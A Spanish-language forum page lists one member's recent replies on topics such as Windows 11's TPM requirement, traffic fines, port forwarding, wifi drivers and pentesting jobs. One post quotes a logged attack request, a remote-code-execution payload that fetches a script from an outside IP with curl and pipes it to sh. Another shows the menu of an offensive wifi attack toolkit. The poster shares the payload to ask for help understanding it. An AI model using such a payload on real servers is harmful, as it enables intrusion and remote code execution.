elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Usando Git para manipular el directorio de trabajo, el índice y commits (segunda parte)


  Mostrar Mensajes
Páginas: [1] 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 ... 115
1  Sistemas Operativos / Windows / Re: Windows 11 en: Ayer a las 21:58

La exigencia de TPM 2.0 es una que no van a cumplir necesariamente todos los ordenadores. TPM 2.0, sigas de Trusted Platform Module, es un coprocesador seguro que almacena claves de cifrado para proteger la información. Actualmente se incluye en el chipset de las placas base, a pesar de que trabaje de manera conjunta con la CPU. En este chip se almacenan, por ejemplo, las claves seguras usadas por la verificación biométrica de Windows, como el lector de huellas o la webcam con Windows Hello.


Eso solo afectará a los fabricantes que quieran vender pc con windows preinstalado. Como el secure boot, windows funciona perfectamente en modo legacy o compatibilidad heredada.

TPM es un requisito que te suele pedir bitlocker, aunque también se puede cifrar una unidad de sistema sin TPM  :silbar:
2  Foros Generales / Foro Libre / Re: El Estado y la DGT en España en: 10 Junio 2021, 08:39 am
Esto se lleva a juicio y sales ganando enseguida con los costes de juicio pagados por parte de la administración.

Tu tiempo y el adelanto del dinero y el mal rato que te llevas ¿quien te lo paga?


Citar
Muchas veces no hace falta ni juicio, presentas un recurso ante la DGT y te dan la razón.

Yo no conozco a nadie al que trafico le ha haya dado la razón. En los casos en los cuales yo he "ganado el recurso" ha sido por el procedimiento del silencio administrativo. En su momento me explicaron que lo hacen así, porque si me dan la razón expresamente puedo reclamar las costas de las pruebas periciales que haya presentado en el recurso.


3  Seguridad Informática / Seguridad / Re: Oferta de Trabajo: Mercadona buscar un hacker - Pentester - Red Team en: 9 Junio 2021, 20:01 pm

Lo que creo que tendría que hacer Mercadona y cualquier otra empresa es encargar a una empresa externa que se dedique a ello para hacer una auditoría de seguridad. Saldrá quizás más caro, pero los resultado serán mas buenos.


Discrepo de esta premisa, cuando tu contratas una empresa externa para hacer auditorias de seguirdad, tendrás el resultado que hay en el mercado, para algunos clientes puede ser bueno, para otros es un resultado mediocre, ya que no entran en mas de lo que tienen establecido dejando fuera de los informes las peculiaridades de la empresa, unido a que generalmente mandan a becarios hacer los trabajos, mientras que el "experto estrella" esta calentando banquillo para dedicarlo a clientes mas gordos, o para el asesoramiento y la coordinación interna.

visto desde el punto de vista de la eficiencia, para pagar una pasta por una auditoria hecha por un becario de una empresa externa, contratas directamente a un becario y que aporte lo que tenga que aportar.

visto desde el punto de vista de la eficacia, pues dependerá al 100% de las personas que al final compongan ese equipo de pentesters, luego el de recursos humanos tiene un papelón  :xD
4  Sistemas Operativos / GNU/Linux / Re: Solución wifi lento en: 3 Mayo 2021, 22:37 pm
busca los drivers para tu modelo de tarjeta.

a mi me pasa cuando se cargan los drivers genéricos, para navegar bien, pero si ya quieres mas, vas de culo.

lo malo es que muchos fabricantes no dan soporte para linux
5  Comunicaciones / Redes / Re: Mi puertos parecen abiertos pero no lo están en: 18 Abril 2021, 11:02 am
Lo primero que teneis que saber es que os ofrece vuestro isp.

por ejemplo los usuarios de pepephone no disponen de una ip publica, sino que su ip publica esta nateada por el isp, luego por mucho que abras puertos no vas a poder hacer nada

una vez que sabeis que teneis una ip para vosotros solitos, lo mas rapido es, en el pc inciar con una imagen linux, habilitar un servidor web y hacer una pagina de inicio, y abrir el puerto 80 en el router, si tecleas http://laippublica y veis la pagina web que habeis creado, problema del bloqueo del sistema operativo, si no la veis, problema del router que no habeis abierto bien el puerto, o no habeis hecho el portforwarding
6  Comunicaciones / Redes / Re: Conectar dos dispositivos mediante cable ethernet. en: 18 Abril 2021, 10:52 am
en linux



y en windows con conexión compartida
7  Seguridad Informática / Seguridad / Re: Peticiones al servidor usando Yii PHP Framework en: 19 Marzo 2021, 19:32 pm
¿Qué user agent hace la petición?



Código:
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
8  Seguridad Informática / Seguridad / Peticiones al servidor usando Yii PHP Framework en: 13 Marzo 2021, 19:38 pm
Últimamente me están lanzando al servidor web, bastantes peticiones del tipo:

Código:
Requested GET /?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=curl+--user-agent+curl_tp5+http://31.210.20.181/ldr.sh|sh

Una rápida búsqueda en google, me dice que pueden ser originadas por alguna de las herramientas de Yii PHP framework

el código de la petición entiendo que es básicamente que descargue un script y lo ejecute.

a ver si alguien tiene mas conocimientos sobre el tema
9  Seguridad Informática / Hacking Wireless / Re: Offensive Wifi Toolkit en: 6 Marzo 2021, 19:31 pm
Código:
ewr "\n${NONE}[${LRED}Interface${NONE}]${LBLUE} ${iface}${NONE}   [${LRED}Mode${NONE}]${LBLUE} ${Mod}${NONE}   [${LRED}Target Network${NONE}]${LBLUE} ${nn}${NONE}\n"
ewr "${LGREEN}----------${NONE}[${LBLUE}General${NONE}]${LGREEN}---------\n"
ewr "${YELLOW}0] Main Menu\n"
ewr "${LGREEN}-------${NONE}[${LBLUE}Wifi Attacks${NONE}]${LGREEN}-------\n"
ewr "${YELLOW}1${NONE}] ${YELLOW}Beacon Flood Attack"
ewr "${YELLOW}2${NONE}] ${YELLOW}Deauth/Jamming Attack"
ewr "${YELLOW}3${NONE}] ${YELLOW}Basic AP Probe"
ewr "${YELLOW}4${NONE}] ${YELLOW}WIDS/WIPS Confusion Attack"
ewr "${YELLOW}5${NONE}] ${YELLOW}Michael Shutdown Exploitation"
        ewr "${YELLOW}6${NONE}] ${YELLOW}Authentication DoS Attack (AP Freeze)\n"

Pues eso, aircrack y mdk3, nada nuevo bajo el sol.

El que busque milagros, a Lourdes y de rodillas  :silbar:
10  Foros Generales / Foro Libre / Re: Necesito asustar a mi vecino porque maltrata a su perro y es un hijo de p**a en: 16 Enero 2021, 12:12 pm
Lo que tu puedes considerar maltrato, otra persona lo puede considerar educación.

yo que un padre le pegue un cachete a su hijo no lo considero maltrato, y la propia sociedad usa elementos coercitivos para corregir las conductas, si no, no existirían las cárceles.

aquí seguro que saldrá algún gili... a decir que eso es maltrato, que cada uno eduque a sus hijos como quiera, estamos en una sociedad tan pusilánime que así nos va.

metete en tus asuntos, que es lo que tienes que hacer, y tú educa a tus animales como quieras y deja que otros los eduquen a su manera, el objetivo de la educación es el mismo, que el animal conviva en sociedad, y al igual que no hay dos hombres iguales, no hay dos perros iguales, y lo que funciona para uno, no necesariamente tiene que funcionar para el otro.
Páginas: [1] 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 ... 115
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines